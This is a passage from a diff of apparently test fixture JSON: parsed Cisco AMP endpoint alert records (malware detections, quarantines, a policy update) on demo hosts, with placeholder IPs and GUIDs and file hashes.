"6411444887895409000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d1:e2:b6:61:ef:7a", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d1:e2:b6:61:ef:7a" + ] + }, + "detection_id": "6411444887895408641", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:58:57.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854019384Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419187549993959000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419187549993959449", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 2980, + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "@timestamp": "2021-01-14T11:58:57.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + 
], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854021268Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f390
08a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419187549993959000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419187549993959449", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "mssecsvc.exe", + "pid": 2980, + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "@timestamp": "2021-01-14T11:58:54.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\Windows\\tasksche.exe", + "hash": { + "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "md5": "84c82835a5d21bbcf75a61706d8ab549" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": 
"windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854023153Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "kind": "alert", + 
"action": "Threat Detected", + "id": "6419187537109058000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419187537109057560", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:58:54.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:23.854025059Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419187537109058000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419187537109057560", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:49:08.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_MAP_FriedEx", + "hostname": "Demo_AMP_MAP_FriedEx" + }, + "event": { + "severity": 0, + "action": "Policy Update", + "ingested": "2021-09-12T17:32:23.854026933Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "id": "6583853374897127000", + "kind": "alert" + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "04:e6:4d:d5:7a:b5", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "04:e6:4d:d5:7a:b5" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648130 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": "2021-01-14T11:41:12.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" 
+ ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854028807Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "start": "2021-01-14T11:41:12.000Z", + "action": "Executed malware", + "id": "14945825043963", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": 
"53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296272 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "@timestamp": "2021-01-14T11:41:12.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854030779Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected 
Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "start": "2021-01-14T11:41:12.000Z", + "action": "Multiple Infected Files", + "id": "14945825043964", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.ED01EBFBC9-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296258 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:28:46.000Z", + "file": { + "hash": { + "sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + 
"hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Exploit_Prevention_Audit", + "hostname": "Demo_AMP_Exploit_Prevention_Audit" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854032652Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}", + "kind": "alert", + "action": "Retrospective Quarantine", + "id": "6533671599780921000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d2:78:15:4a:f4:a2", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + 
}, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d2:78:15:4a:f4:a2" + ] + }, + "detection_id": "6533671595485954049", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648155 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:28:45.000Z", + "file": { + "name": "pp32.exe", + "path": "\\\\?\\C:\\pp32.exe", + "hash": { + "sha1": "bdb11107a33eaeded6a838eb2a0e6167637dbe9c", + "sha256": "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "md5": "5df0c4ebca109779dc8afc745d612637" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "hash": [ + "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79", + "5df0c4ebca109779dc8afc745d612637", + "bdb11107a33eaeded6a838eb2a0e6167637dbe9c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_AMP_Exploit_Prevention_Audit", + "hostname": "Demo_AMP_Exploit_Prevention_Audit" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:23.854034528Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671595485954000,\"timestamp\":1610623725,\"timestamp_nanoseconds\":899000000,\"date\":\"2021-01-14T11:28:45+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.FCE5B6784D-100.SBX.TG\",\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"pp32.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\pp32.exe\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\",\"sha1\":\"bdb11107a33eaeded6a838eb2a0e6167637dbe9c\",\"md5\":\"5df0c4ebca109779dc8afc745d612637\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6533671595485954000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.FCE5B6784D-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "d2:78:15:4a:f4:a2", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "d2:78:15:4a:f4:a2" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533671595485954049", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T11:26:38.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + 
